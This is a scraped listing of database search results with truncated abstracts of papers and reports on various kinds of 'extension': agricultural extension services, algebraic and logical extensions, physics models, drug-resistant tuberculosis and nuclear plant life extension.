Examples of research-based support for the framing of scientific issues are presented, along with a literature-based discussion of the… 8. Banana Algebra: Compositional Syntactic Language Extension DEFF Research Database (Denmark) Andersen, Jacob; Brabrand, Claus; Christiansen, David Raymond 2013-01-01 We propose an algebra of languages and transformations as a means of compositional syntactic language extension. The algebra provides a layer of high-level abstractions built on top of languages (captured by context-free grammars) and transformations (captured by constructive catamorphisms). The ... 9. Principles Guiding Vocabulary Learning through Extensive Reading Science.gov (United States) Nation, Paul 2015-01-01 Extensive reading is one of a range of activities that can be used in a language learning course. Ideally, the choice of activities to go into a course should be guided by principles which are well supported by research. Similarly, the way each of those activities is used should be guided by well-justified principles. In this article, we look at… 10. Improving Generation Y Volunteerism in Extension Programs Science.gov (United States) Andrews, Kevin B.; Lockett, Landry L. 2013-01-01 Members of Generation Y have many positive attributes that make them attractive to Extension volunteer administrators as a potential source of labor. However, they think differently, have unique needs, require new management styles, and have less tolerance for unpleasant working conditions than previous generations. Additionally, they are engaged… 11. Equivalence relations of AF-algebra extensions Home; Journals; Proceedings – Mathematical Sciences; Volume 120; Issue 2. Equivalence Relations of -Algebra Extensions. Changguo Wei. Volume 120 Issue 2 April 2010 ... Author Affiliations. Changguo Wei1. School of Mathematical Sciences, Ocean University of China, Qingdao 266071, People's Republic of China ... 12. Issues for Agricultural Extension Policy in Nigeria African Journals Online (AJOL) Agriculture is the bedrock of economic development in Nigeria. However, the development of the ... This policy direction placed additional responsibilities on extension by including sustainable development ... years and the recent trends in agricultural development world wide have necessitated the formulation of more ... 13. Supersymmetric Extension of Technicolor & Fermion Mass Generation DEFF Research Database (Denmark) Antola, Matti; Di Chiara, Stefano; Sannino, Francesco 2012-01-01 We provide a complete extension of Minimal Walking Technicolor able to account for the standard model fermion masses. The model is supersymmetric at energies greater or equal to the technicolor compositeness scale. We integrate out, at the supersymmetry breaking scale, the elementary Higgses. We... 14. On Viviani's Theorem and Its Extensions Science.gov (United States) Abboud, Elias 2010-01-01 Viviani's theorem states that the sum of distances from any point inside an equilateral triangle to its sides is constant. Here, in an extension of this result, we show, using linear programming, that any convex polygon can be divided into parallel line segments on which the sum of the distances to the sides of the polygon is constant. Let us say… 15. Emergency Food Programs: Untapped Opportunities for Extension? Science.gov (United States) Mobley, Amy R. 
2012-01-01 This article reports results from a questionnaire that assessed the frequency and type of nutrition questions asked at emergency food programs to determine if Extension professionals need to increase direct outreach efforts. Emergency food program workers (n = 460) were recruited via mail to complete a self-administered survey. More than one-third… 16. Extending the Agricultural Extension Model. Preliminary Draft. Science.gov (United States) Rogers, Everett M.; And Others The purposes of this report are: to describe the main elements of the U.S. agricultural extension model and its effects on the agricultural revolution; to analyze attempts to extend this model to non-agricultural technology and/or to less developed countries; and to draw general conclusions about the diffusion of technological innovations, with… 17. Need for Methamphetamine Programming in Extension Education Science.gov (United States) Beaudreault, Amy R.; Miller, Larry E. 2011-01-01 The study reported sought to identify the prevention education needs involving methamphetamine through survey methodology. The study focused on a random sample of U.S. states and the Extension Directors within each state, resulting in a 70% response rate (n = 134). Findings revealed that 11% reported they had received methamphetamine user… 18. EXTENSION OF THE PROGRESSIVE RETIREMENT PROGRAMME CERN Multimedia Human Resources Division 2002-01-01 In accordance with the provisions agreed by the Finance Committee and Council in March and June 2000, respectively, the Director-General has approved the extension of the Progressive Retirement Programme with effect from 1 April 2001, for one year. Human Resources Division Tel. 72808/74128 19. A Graph Library Extension of SVG DEFF Research Database (Denmark) Nørmark, Kurt 2007-01-01 be aggregated as a single node, and an entire graph can be embedded in a single node. In addition, a number of different graph animations are described. The starting point of the SVG extension is a library that provides an exact of mirror of SVG 1.1 in the functional programming language Scheme. Each element... 20. Assessment Of Shell Petroleum Development Company Extension ... African Journals Online (AJOL) The study assessed Shell Petroleum Development Company Extension Services in Etche Local Government Area of Rivers State, Nigeria. Data were gathered form four categories of respondents drawn from the Company\\'s staff and the communities. A total of 180 respondents participated in the study. means scores and ... 1. Communication for Rural Innovation : rethinking agricultural extension NARCIS (Netherlands) Leeuwis, C.; Ban, van den A.W. 2004-01-01 This important book is the re-titled third edition of the extremely well received and widely used Agricultural Extension (van den Ban & Hawkins, 1988, 1996). Building on the previous editions, Communication for Rural Innovation maintains and adapts the insights and conceptual models of value 2. 77 FR 35366 - Agency Information Collection Extension Science.gov (United States) 2012-06-13 ... following Web site: http://www1.eere.energy.gov/wip/historic_preservation.html . SUPPLEMENTARY INFORMATION... DEPARTMENT OF ENERGY Office of Energy Efficiency and Renewable Energy Agency Information... Department of Energy (DOE) has submitted an information collection request to the OMB for extension under the... 3. Women Empowerment And Agricultural Extension Policy: The ... 
African Journals Online (AJOL) This paper examined the role and challenges of extension agents in empowering women in a bid to revamp the agricultural sector. The activities of women in agricultural production are reviewed against the backdrop of global shift to gender sensitivity, particularly the emphasis on the role of women in agriculture. The paper ... Science.gov (United States) Meng, Fanshao 2009-01-01 A good reading competence is a necessity for those studying English for academic and occupational purposes. Based on the results of previous research, theory and practice on L2 Extensive Reading, this paper analyses current situation for teaching and learning reading in our Chinese universities and proposes practical applications of extensive… Science.gov (United States) Jacobs, George M. 2016-01-01 How can teachers motivate students to read extensively in a second language? One strategy is for teachers to read aloud to students to promote the joys of reading generally, to build students' language skills and to introduce students to specific authors, book series, genres, websites, etc. This article begins by discussing why teachers might want… Science.gov (United States) He, Mu 2014-01-01 Research has shown a wide range of learning benefits accruing from extensive reading. Not only is there improvement in reading, but also in a wide range of language uses and areas of language knowledge. However, few research studies have examined reading speed. The existing literature on reading speed focused on students' reading speed without… 7. African Journal of Livestock Extension: Contact African Journals Online (AJOL) Principal Contact. DR. G.R.K. Sharma Editor-in-Chief Dept. of Vet & A. H. Extension College of Vet. Science A.N.G.R. Agricultural University Tirupati – 517502 Andhra Pradesh India Email: [email protected] ... 8. Subintegrality, invertible modules and Laurent polynomial extensions In [4], Roberts and Singh have introduced the group I(A,B) to generalize a result of Dayton. The relation between the group I(A,B) and subintegral extensions has been investigated by Reid, Roberts and Singh in a series of papers. Recently in [5], Sadhu and Singh have proved that A is subintegrally closed in B if and ... 9. Paramecium: An Extensible Object-Based Kernel NARCIS (Netherlands) van Doorn, L.; Homburg, P.; Tanenbaum, A.S. 1995-01-01 In this paper we describe the design of an extensible kernel, called Paramecium. This kernel uses an object-based software architecture which together with instance naming, late binding and explicit overrides enables easy reconfiguration. Determining which components reside in the kernel protection 10. 77 FR 70995 - Agency Information Collection Extension Science.gov (United States) 2012-11-28 ... NWPA-830G is an Appendix to the Standard Contract for Disposal of Spent Nuclear Fuel and/or High-Level... Title: Standard Contract for Disposal of Spent Nuclear Fuel and/or High-Level Radioactive Waste... DEPARTMENT OF ENERGY Energy Information Administration Agency Information Collection Extension... 11. Transforming agriculture through contracted extension service ... African Journals Online (AJOL) Transformation of small holder agriculture from subsistence farming to agribusiness focused systems is paramount towards attainment of Kenya's vision 2030 and the Millennium Development Goals. This requires extension service delivery systems that focus on addressing challenges within agricultural product value ... 12.
Constructing Natural Extensions of Propositional Logics Czech Academy of Sciences Publication Activity Database 2016-01-01 Roč. 104, č. 6 (2016), s. 1179-1190 ISSN 0039-3215 R&D Projects: GA ČR GA13-14654S Institutional support: RVO:67985807 Keywords: abstract algebraic logic * consequence relations * propositional logic * natural extensions * transfer theorems Subject RIV: BA - General Mathematics Impact factor: 0.589, year: 2016 13. Extension agents' technical knowledge requirements for effective ... African Journals Online (AJOL) Technical knowledge requirements of extension agents were investigated in this study. Data for the study was collected with the aid of a structured questionnaire administered to the 78 respondents. It was found that respondents were mainly males, were married, were in the middle age category, had BSc/HND, made ... 14. Department of Agricultural Extension and Rural Development ... African Journals Online (AJOL) USER 2017-01-27 262. Ethiopian Journal of Environmental Studies & Management 10(2): 262 – 275, 2017. ISSN:1998-0507 doi: http://dx.doi.org/10.4314/ejesm.v10i2.12. Submitted: January 27, 2017. Accepted: March 20, 2017. Department of Agricultural Extension and Rural Development, University of Ilorin, Ilorin, Nigeria. Abstract. 15. Rural Development And Agricultural Extension Administration In ... African Journals Online (AJOL) This paper reviewed the wide range of policies and approaches formulated and implemented to effect agricultural and rural development in Nigeria. The paper reveals that the common feature of all the strategies is the use of institutionalized agricultural extension service, devoted principally to augment smallholder ... 16. Ethics and morals in the extension work Directory of Open Access Journals (Sweden) Fátima Lourdes Morales Intriago 2017-05-01 Full Text Available One of the main criticisms of the agents who provide rural extension is the lack of proposals suited to farmers' realities. Extensionists work according to ethics and morals. A theoretical review was carried out by analysing how these concepts apply to extension agents. This paper discusses how agents act with respect to these notions and the conflicts they can cause with rural communities. It was found that the extensionist's behaviour is shaped by the values, norms and sanctions of their formation, which determines the changes that occur in the communities served. On the other hand, farmers do not receive appropriate attention from the organisations that facilitate rural extension, which ignore their interests and priorities. In addition, agents, as employees of the institutions that provide assistance and extension, lose autonomy in their contact with communities. It was concluded that agents act correctly with respect to morality, and also with respect to ethics, since they follow the rules of the institution to which they belong, which do not always match what rural people pursue. 17. Particle Swarm Optimisation with Spatial Particle Extension DEFF Research Database (Denmark) Krink, Thiemo; Vesterstrøm, Jakob Svaneborg; Riget, Jacques 2002-01-01 In this paper, we introduce spatial extension to particles in the PSO model in order to overcome premature convergence in iterative optimisation. The standard PSO and the new model (SEPSO) are compared w.r.t. performance on well-studied benchmark problems. We show that the SEPSO indeed managed to... 18.
Entrepreneurial Extension Conducted via Social Media Science.gov (United States) Cornelisse, Sarah; Hyde, Jeffrey; Raines, Christopher; Kelley, Kathleen; Ollendyke, Dana; Remcheck, James 2011-01-01 The widespread availability of and access to the Internet have led to the development of new forms of communication. Collectively termed "social media," these new communication tools have created vast opportunities for Extension professionals in how they perform their work and how businesses interact with consumers. This article outlines currently… 19. Subintegrality, invertible modules and Laurent polynomial extensions Indian Acad. Sci. (Math. Sci.) Vol. 125, No. 2, May 2015, pp. 149–160. c Indian Academy of Sciences. Subintegrality, invertible modules and Laurent polynomial extensions. VIVEK SADHU. Department of Mathematics ...... comments which have improved the exposition. Further, he would like to thank CSIR,. India for financial ... 20. Communication for strengthening agricultural extension and rural ... African Journals Online (AJOL) This paper argues that extension workers need training in Communication for Development (C4D), an emerging body of knowledge for addressing problems, such as participation, integration and capacity building for them to relate more effectively with development partners. Thus, this paper proposes a C4D framework for ... 1. Catastrophic failure of polymer melts during extension DEFF Research Database (Denmark) Rasmussen, Henrik K. 2013-01-01 Numerical flow modeling has been applied to study the break of monodisperse polymer melts during extension. These continuum mechanical based computations are within the ideas of the microstructural ’interchain pressure’ theory. Calculated breaks, a result of small initial sample imperfections, ag... 2. Extension Procedures for Confirmatory Factor Analysis Science.gov (United States) Nagy, Gabriel; Brunner, Martin; Lüdtke, Oliver; Greiff, Samuel 2017-01-01 We present factor extension procedures for confirmatory factor analysis that provide estimates of the relations of common and unique factors with external variables that do not undergo factor analysis. We present identification strategies that build upon restrictions of the pattern of correlations between unique factors and external variables. The… 3. Livestock extension practice and competency among agricultural ... African Journals Online (AJOL) The test-retest technique was used to pre-test the instrument, yielding a coefficient r=0.91. Descriptive, correlation and t-test statistics were used to analyze data. Results revealed that about 40% of respondents engaged in livestock extension activities in the last two years, while about 16% actually specialized in Animal ... 4. Testing Extension Services through AKAP Models Science.gov (United States) De Rosa, Marcello; Bartoli, Luca; La Rocca, Giuseppe 2014-01-01 Purpose: The aim of the paper is to analyse the attitude of Italian farms in gaining access to agricultural extension services (AES). Design/methodology/approach: The ways Italian farms use AES are described through the AKAP (Awareness, Knowledge, Adoption, Product) sequence. This article investigated the AKAP sequence by submitting a… 5. Towards professionalism in agricultural extension: The professional ... African Journals Online (AJOL) 6. 78 FR 31885 - Patent Term Extension Science.gov (United States) 2013-05-28 ... DEPARTMENT OF COMMERCE Patent and Trademark Office Patent Term Extension ACTION: Proposed collection; comment request. 
SUMMARY: The United States Patent and Trademark Office (USPTO), as part of its... States Patent and Trademark Office, P.O. Box 1450, Alexandria, VA 22313-1450. Federal Rulemaking Portal... 7. Extensively Drug-Resistant Tuberculosis, Burkina Faso OpenAIRE Saleri, Nuccia; Badoum, Gisèle; Ouedraogo, Martial; Dembélé, Sary M.; Nacanabo, Rachel; Bonkoungou, Victor; Cirillo, Daniela; Pinsi, Gabriele; Matteelli, Alberto 2010-01-01 Because data from countries in Africa are limited, we measured the proportion of extensively drug-resistant (XDR) tuberculosis (TB) cases among TB patients in Burkina Faso for whom retreatment was failing. Of 34 patients with multidrug-resistant TB, 2 had an XDR TB strain. Second-line TB drugs should be strictly controlled to prevent further XDR TB increase. 8. Non extensive considerations on a Machian Universe Energy Technology Data Exchange (ETDEWEB) Abreu, Everton M.C.; Ananias Neto, Jorge [Universidade Federal Rural do Rio de Janeiro (UFRRJ), Seropedica, RJ (Brazil); Universidade Federal de Juiz de Fora, MG (Brazil) 2013-07-01 Full text: There is an extension of the usual Boltzmann-Gibbs theory (BG) that is called Tsallis statistical theory (TT). To sum up, the formalism initially considers the entropy formula as a non extensive (NE) quantity where there is a parameter q that measures the so-called degree of nonextensivity. This formalism has been successfully applied in many physical models. An important feature is that when q → 1 we recover the usual Boltzmann-Gibbs theory, i.e., we have an extensive theory. The dependence of the mass of a particle on the rest of the universe was argued by Mach in the nineteenth century itself in what is now famous as Mach's Principle. The Principle is counterintuitive in that we tend to consider the mass which represents the quantity of matter in a particle to be an intrinsic property of the particle. But the following statement of Mach's Principle shows it to be otherwise, thus going counter to ideas of locality and causality. The purpose of this paper is to use the non extensive concept in order to analyze the Machian view of the Universe. We will calculate the Machian components of the theory as functions of the nonextensivity parameter q and we will discuss its consequences. We will also show the influence of the asymptotic behavior in these Machian q-parameters. (author) 9. South African Journal of Agricultural Extension African Journals Online (AJOL) The South African Journal of Agricultural Extension aims to: * advance and apply the science of extension and of rural development as a scientific discipline by stimulating thought, study, research, discussion and the publication and exchange of knowledge both nationally and internationally. * promote the professionalism ... 10. Extension Study Group Members View Their Clubs and Extension Home Economists. ANREI Publication No. 28. Science.gov (United States) Miller, Mason E. The data presented in this report were selected from a 1972 study of Michigan Extension Study Group (ESG) members. Included are data descriptive of the women themselves and their situation (area and type of home, age, income, ESG experience, and especially their attitudes toward their ESG and their Extension Home Economists). Selected findings are… 11.
Collaboration of Extension and Grape Industry Members to Create a New Extension Publication Science.gov (United States) Stafne, Eric T.; Ingels, George; Ingels, Jane; Carroll, Becky 2016-01-01 Collaboration is an important part of the interaction between Extension and industry. Successful sharing of workload can provide benefits for both parties. A project to create a workbook to address vineyard sustainability was initiated by members of the Oklahoma grape industry with assistance from land-grant university Extension. Productive… 12. The Changing Nature of the Cooperative Extension System: Views of Leading Extension Administrators. Science.gov (United States) 1993-01-01 Four administrators of the Cooperative Extension System share their views concerning recent substantial changes in the system's focus of programing, sources of funding, and organizational structures; the need for all disciplines involved in extension to grapple with societal problems; and relationships with institutions of higher education. (LP) 13. Tampa Bay Extension Agents' Views of Urban Extension: Philosophy and Program Strategies Directory of Open Access Journals (Sweden) Amy Harder 2017-06-01 Full Text Available The purpose of this article was to explore the concept of urban Extension as perceived by Extension agents within the Tampa Bay area, one of Florida's fastest growing metropolitan areas. From a theoretical perspective, it is critical to understand Extension agents' beliefs about urban Extension because behaviors are directly related to attitudes (Ajzen, 2012). In 2016, a qualitative investigation was undertaken to explore the perspectives of 23 agents working within the Tampa Bay area. Results showed the majority of agents believed that context and client needs are unique for urban Extension, and that to a lesser extent, unique agent expertise is required. Further, these beliefs impacted how agents reported their approach to programming, with an emphasis on providing convenience and seeking partnerships. Difficulties were identified related to identifying the role of Extension in a resource-rich environment of service providers, which contributed to the existence of a perceived disconnect between urban audiences and Extension. Opportunities exist for Extension leadership to provide strategic organizational support that will enhance agents' abilities to succeed in the metropolitan environment. 14. Dirac Triplet Extension of the MSSM CERN Document Server Alvarado, C.; Martin, A.; Ostdiek, B. 2015-08-13 In this paper we explore extensions of the Minimal Supersymmetric Standard Model involving two $SU(2)_L$ triplet chiral superfields that share a superpotential Dirac mass yet only one of which couples to the Higgs fields. This choice is motivated by recent work using two singlet superfields with the same superpotential requirements. We find that, as in the singlet case, the Higgs mass in the triplet extension can easily be raised to $125\,\text{GeV}$ without introducing large fine-tuning. For triplets that carry hypercharge, the regions of least fine tuning are characterized by small contributions to the $\mathcal{T}$ parameter, and light stop squarks, $m_{\tilde t_1} \sim 300-450\,\text{GeV}$; the latter is a result of the $\tan\beta$ dependence of the triplet contribution to the Higgs mass. Despite such light stop masses, these models are viable provided the stop-electroweakino spectrum is sufficiently compressed. 15.
Geometric extension through Schwarzschild r = 0 International Nuclear Information System (INIS) Lynden-Bell, D.; Katz, J.; Hebrew Univ., Jerusalem 1990-01-01 Singularities in space-time are not necessarily cancers in the manifold but can herald interesting topological change in the space-time at places where there are several different tangent Minkowski spaces. Most discussions of gravitational collapse cease when space-time becomes singular. In the 'hour-glass' universe we have an example where the singularity develops in empty space; here we give a geometrical extension through the singularity in which geodesics that enter it emerge into a new space. The result extends Schwarzschild space and is periodic in 'extended' Penrose coordinates. There is a topological singularity but no mass at r = 0. The extension is mildly nonanalytic but unique. It is based on the concept that time does not stop and that empty space-times which develop singularities must still have zero Ricci tensors even where the Riemann tensor becomes infinite. (author) 16. EPRI nuclear plant life extension program overview International Nuclear Information System (INIS) Rubio, A.; Carey, J.J.; Lapides 1986-01-01 In 1978-1979, EPRI undertook a series of studies which suggested that extending the operation of current nuclear generating units beyond their nominal 40-year license term was both technically feasible and economically attractive. In 1984, these results were reviewed and confirmed and more detailed evaluations initiated. Major elements include: a) identification of life extension as a strategic element of the EPRI Nuclear Division program; b) formulation of a joint EPRI/DOE program plan to culminate in the licensing of a generating unit(s) for extended life; and, c) initiation of two extensive studies, by and with utilities, to provide guidelines for such achievement. The pilot studies began in early 1985. This paper describes the background and status of these efforts to date 17. [Juvenile nasopharyngeal angiofibroma with orbital extension]. Science.gov (United States) Hervás Ontiveros, A; España Gregori, E; Climent Vallano, L; Rivas Rodero, S; Alamar Velázquez, A; Simal Julián, J A 2015-01-01 The case is presented of a 21 year-old male with a history of left proptosis and diplopia of two weeks of onset. The MRI showed an ethmoid-orbital vascular lesion with anterior skull base invasion and orbital extension. Biopsy of the ethmoid confirmed fibrovascular tissue, which supported the diagnosis of angiofibroma. It is a benign neoplasm with local characteristics of malignancy due to its ability to invade adjacent areas. In this case, the debut presented with manifestations of orbital extension. A broad and multidisciplinary approach is needed in order to improve prognosis. Copyright © 2013 Sociedad Española de Oftalmología. Published by Elsevier España, S.L.U. All rights reserved. 18. States On Orthocomplemented Difference Posets (Extensions) Science.gov (United States) Hroch, Michal; Pták, Pavel 2016-08-01 We continue the investigation of orthocomplemented posets that are endowed with a symmetric difference (ODPs). The ODPs are orthomodular and, therefore, can be viewed as "enriched" quantum logics. In this note, we introduced states on ODPs. We derive their basic properties and study the possibility of extending them over larger ODPs. We show that there are extensions of states from Boolean algebras over unital ODPs. 
Since unital ODPs do not, in general, have to be set-representable, this result can be applied to a rather large class of ODPs. We then ask the same question after replacing Boolean algebras with "nearly Boolean" ODPs (the pseudocomplemented ODPs). Making use of a few results on ODPs, some known and some new, we construct a pseudocomplemented ODP, P, and a state on P that does not allow for extensions over larger ODPs. 19. Controleum - an independently extensible control system DEFF Research Database (Denmark) Jensen, Martin Lykke Rytter 2014-01-01 - hard concerns are constraints that must always be met, while soft concerns describe desirable goals that may be prioritized by the system's user. The extensible controller uses a genetic algorithm to continuously resolve conflicts among independently developed control concerns. Both new software...... to introduce a new component without performing a global integrity check. Avoiding a global integrity check relies on anticipating what kind of extensions are required in the future and designing a suitable interface and coordination mechanism, so that conflicts among mutually unaware components can...... be resolved automatically. Typical control system components are concerned with the way in which actuators are controlled. Combining mutually unaware control system components that share interest in the same actuators are likely to lead to complex conflicts, thus making control systems a particularly... 20. Mathematical model of subscriber extension line OpenAIRE Petříková, Iva; Diviš, Zdeněk; Tesař, Zdeněk 2012-01-01 The paper focuses on measurement properties of metallic subscriber extension lines to build regression mathematical model for a symmetric pair cable. The regression model is compared with an analytical model based on a theoretical description of transfer parameters for this type of line. The output of the paper should demonstrate the impact of electromagnetic interference on the symmetric pair. The paper also describes the method to identify the interference sources and ... 1. Emergence of Extensively Drug Resistant Tuberculosis Centers for Disease Control (CDC) Podcasts 2007-03-01 Extensively drug-resistant tuberculosis (XDR TB) outbreaks have been reported in South Africa, and strains have been identified on 6 continents. Dr. Peter Cegielski, team leader for drug-resistant TB with the Division of Tuberculosis Elimination at CDC, comments on a multinational team's report on this emerging global public health threat. Created: 3/1/2007 by Emerging Infectious Diseases. Date Released: 3/26/2007. 2. Learning PrimeFaces extensions development CERN Document Server Jonna, Sudheer 2014-01-01 This book provides a step by step approach that explains the most important extension components and their features. All the major features are explained by using the JobHub application with supporting screenshots. If you are an intermediate to advanced level user (or developer) who already has a basic working knowledge of PrimeFaces, then this book is for you. The only thing you need to know is Java Server Faces (JSF). 3. Equivalence relations of AF-algebra extensions classifications of C*-algebras together with K-theory and index theory (see [2]). The available classification results of C∗ ... Let $e_i : 0 \to B \xrightarrow{\alpha_i} E_i \xrightarrow{\beta_i} A \to 0$ be two extensions of A by B with Busby invariants $\tau_i$ for $i = 1, 2$. Then $(E_1, \alpha_1, \beta_1)$ and $(E_2, \alpha_2, \beta_2)$ are called congruent (called 'strongly isomorphic' in [2]), denoted by $e_1$ ... 4.
Stable Extensions with(out) Gravity DEFF Research Database (Denmark) Antipin, Oleg; Krog, Jens; Mojaza, Matin 2014-01-01 We investigate the vacuum stability as well as the gravitational corrections in extensions of the Standard Model featuring a new complex scalar, and two Dirac fermions for different choices of the hypercharge of the scalar and one of the two fermions. The neutral fermion acquires loop-induced mag...... and discover that the models can be compatible with the asymptotically safe gravity scenario at the price of a heavier Higgs and lighter top mass... 5. Extensions and degeneration of spectral triples DEFF Research Database (Denmark) Christensen, Erik; Ivan, Cristina 2009-01-01 To a compact non commutative metric space associated to a C*-algebra A and an extension E of A, we construct 2-parameter family of compact non commutative metric spaces associated to E. It is shown that under certain limits along paths in the parameter space the corresponding spaces converge...... in the quantum Gromov-Hausdorff metric towards either the given non commutative metric space or towards a compact non commutative metric space associated to the compact operators.... 6. Definable maximal discrete sets in forcing extensions DEFF Research Database (Denmark) Törnquist, Asger Dag; Schrittesser, David 2018-01-01 Let  be a Σ11 binary relation, and recall that a set A is -discrete if no two elements of A are related by . We show that in the Sacks and Miller forcing extensions of L there is a Δ12 maximal -discrete set. We use this to answer in the negative the main question posed in [5] by showing... 7. Deformed Fredkin spin chain with extensive entanglement Science.gov (United States) Salberger, Olof; Udagawa, Takuma; Zhang, Zhao; Katsura, Hosho; Klich, Israel; Korepin, Vladimir 2017-06-01 We introduce a new spin chain which is a deformation of the Fredkin spin chain and has a phase transition between bounded and extensive entanglement entropy scaling. In this chain, spins have a local interaction of three nearest neighbors. The Hamiltonian is frustration-free and its ground state can be described analytically as a weighted superposition of Dyck paths that depends on a deformation parameter t. In the purely spin 1/2 case, whenever t\ 8. Radurisation of broilers for shelf life extension International Nuclear Information System (INIS) Bok, H.E.; Holzapfel, W.H.; Van der Linde, H.J. 1982-01-01 Radurization is discussed as a method for the shelf life extension of refrigerated chicken carcasses. One of the advantages is that radurization eliminates potential food pathogenic bacteria like Salmonella in the chicken carcasses. Materials and methods for the radurization of chicken are discussed. The objective of the investigation was to determine the influence of different irradiation doses and storage conditions on the microbiological shelf life and organoleptic quality of fresh broilers 9. Mucocele and pyocele with marked intracranial extension Energy Technology Data Exchange (ETDEWEB) Tsuchiya, Kazuhiro; Machida, Tohru; Iio, Masahiro 1984-08-01 Two cases are presented with frontal sinus pyocele and fronto-ethmoid sinus mucocele in which marked intracranial extension is shown. Their intracranial part appeared as a large biconvex mass, which showed iso or slightly low density homogeneously and had gross calcification in the posterior rim. The findings of the paranasal sinuses and the orbit in tomograms and CT scans are thought to be useful in the differential diagnosis of chronic subdural hematoma. 
10. Applications and extensions of degradation modeling International Nuclear Information System (INIS) Hsu, F.; Subudhi, M.; Samanta, P.K.; Vesely, W.E. 1991-01-01 Component degradation modeling being developed to understand the aging process can have many applications with potential advantages. Previous work has focused on developing the basic concepts and mathematical development of a simple degradation model. Using this simple model, times of degradations and failures occurrences were analyzed for standby components to detect indications of aging and to infer the effectiveness of maintenance in preventing age-related degradations from transforming to failures. Degradation modeling approaches can have broader applications in aging studies and in this paper, we discuss some of the extensions and applications of degradation modeling. The application and extension of degradation modeling approaches, presented in this paper, cover two aspects: (1) application to a continuously operating component, and (2) extension of the approach to analyze degradation-failure rate relationship. The application of the modeling approach to a continuously operating component (namely, air compressors) shows the usefulness of this approach in studying aging effects and the role of maintenance in this type component. In this case, aging effects in air compressors are demonstrated by the increase in both the degradation and failure rate and the faster increase in the failure rate compared to the degradation rate shows the ineffectiveness of the existing maintenance practices. Degradation-failure rate relationship was analyzed using data from residual heat removal system pumps. A simple linear model with a time-lag between these two parameters was studied. The application in this case showed a time-lag of 2 years for degradations to affect failure occurrences. 2 refs 11. Applications and extensions of degradation modeling Energy Technology Data Exchange (ETDEWEB) Hsu, F.; Subudhi, M.; Samanta, P.K. [Brookhaven National Lab., Upton, NY (United States); Vesely, W.E. [Science Applications International Corp., Columbus, OH (United States) 1991-12-31 Component degradation modeling being developed to understand the aging process can have many applications with potential advantages. Previous work has focused on developing the basic concepts and mathematical development of a simple degradation model. Using this simple model, times of degradations and failures occurrences were analyzed for standby components to detect indications of aging and to infer the effectiveness of maintenance in preventing age-related degradations from transforming to failures. Degradation modeling approaches can have broader applications in aging studies and in this paper, we discuss some of the extensions and applications of degradation modeling. The application and extension of degradation modeling approaches, presented in this paper, cover two aspects: (1) application to a continuously operating component, and (2) extension of the approach to analyze degradation-failure rate relationship. The application of the modeling approach to a continuously operating component (namely, air compressors) shows the usefulness of this approach in studying aging effects and the role of maintenance in this type component. 
In this case, aging effects in air compressors are demonstrated by the increase in both the degradation and failure rate and the faster increase in the failure rate compared to the degradation rate shows the ineffectiveness of the existing maintenance practices. Degradation-failure rate relationship was analyzed using data from residual heat removal system pumps. A simple linear model with a time-lag between these two parameters was studied. The application in this case showed a time-lag of 2 years for degradations to affect failure occurrences. 2 refs. 13. Extension of life of nuclear power stations International Nuclear Information System (INIS) Takahashi, Hideaki 1991 At the time of designing nuclear power stations, as their service life, generally 40 years are taken, and the basic design specifications of machinery and equipment are determined. In USA where atomic energy has been developed, the new construction of nuclear power stations is cased for a while, however, if this situation continues as it is, since old power stations reach the service life of 40 years and are retired in near future, it is feared that the circumstance of the total amount of power generation becoming short will occur. As one of the countermeasures to this, the research on the extension of life of nuclear power stations has been carried out in many fields in USA, and it is expected that the application for extending the life for the power stations constructed in the initial period of development is submitted in 1991.
The research carried out to solve the technical problems of this life extension is reported, together with the situation in Japan. The NEC of USA decided that the operation period of nuclear power stations in USA, which is considered to be 40 years so far, can be extended up to the limit of 20 years. The background and circumstances of this problem in USA, Nuclear Plant Aging Research Program, Plant Life Extension Program and so on are reported. (K.I.) 14. The programs for lifetime extension by AREVA International Nuclear Information System (INIS) Knoche, P. 2014-01-01 In 2011 AREVA launched 2 worldwide programs to meet the demands of its customers: 'AREVA Safety Alliance' that proposes a set of measures for post-Fukushima safety upgrading and 'AREVA Forward Alliance' that is dedicated to lifetime extension projects. Concerning 'AREVA Safety Alliance', about 150 projects have been carried out for 53 customers in 19 countries; as for 'AREVA Forward Alliance', 60% of the lifetime extension projects in the US have been performed by AREVA. In the framework of lifetime extension projects, upgrading measures and services are proposed such as the installation of hydrogen recombiner units, of filtered ventilation systems for severe accidents, or the upgrading of the reactor control system through the implementation of the digital Teleperm XS technology, or recommendations about the methodology to follow for the repair or replacement of important components. The replacement of the steam generators and the pressurizer, together with other upgrading works, led to a gain of 18.5% in the output power of the Ringhals-4 unit. (A.C.) 15. LIMB Demonstration Project Extension and Coolside Demonstration Energy Technology Data Exchange (ETDEWEB) Goots, T.R.; DePero, M.J.; Nolan, P.S. 1992-11-10 This report presents results from the Limestone Injection Multistage Burner (LIMB) Demonstration Project Extension. LIMB is a furnace sorbent injection technology designed for the reduction of sulfur dioxide (SO2) and nitrogen oxides (NOx) emissions from coal-fired utility boilers. The testing was conducted on the 105 MWe, coal-fired, Unit 4 boiler at Ohio Edison's Edgewater Station in Lorain, Ohio. In addition to the LIMB Extension activities, the overall project included demonstration of the Coolside process for SO2 removal for which a separate report has been issued. The primary purpose of the DOE LIMB Extension testing was to demonstrate the generic applicability of LIMB technology. The program sought to characterize the SO2 emissions that result when various calcium-based sorbents are injected into the furnace, while burning coals having sulfur content ranging from 1.6 to 3.8 weight percent. The four sorbents used included calcitic limestone, dolomitic hydrated lime, calcitic hydrated lime, and calcitic hydrated lime with a small amount of added calcium lignosulfonate. The results include those obtained for the various coal/sorbent combinations and the effects of the LIMB process on boiler and plant operations. 16. EXTENSION EDUCATION SYMPOSIUM: Getting the most out of your extension appointment and still having a life. Science.gov (United States) Powers, W; Cockett, N; Lardy, G 2017-04-01 Managing the demands of an academic appointment in extension can be a challenging task. Demands from constituent groups, expectations of supervisors, and rigors of promotion and tenure processes can create pressures that young faculty did not expect.
Throw in spousal and family duties and you have created a situation that many will find hard to navigate. However, there are ways to cope and, even better news, there are ways to excel in meeting the demands of an academic appointment and enjoying life. Because many new extension faculty members do not have prior experience in extension, best practices in documenting programs and extension scholarship over the pretenure period are provided in this paper. Appointments that include both research and extension are quite common at many land grant universities. The advantages of joint appointments are numerous and include the fact that more and more grant agencies are seeking integrated research, teaching, and/or extension projects. However, the time demands of joint appointments can be challenging. Joint appointments can be designed to help faculty members conduct important translational research and have it be applied in a production setting. By seeking commonalities in research and extension efforts, joint appointments can be very synergistic. Development of highly successful programs requires planning on the front end with an emphasis on an in-depth needs assessment to determine stakeholder needs for both research and extension. Impact assessment should be part of this planning effort. Performing as a successful extension faculty member while maintaining relationships outside 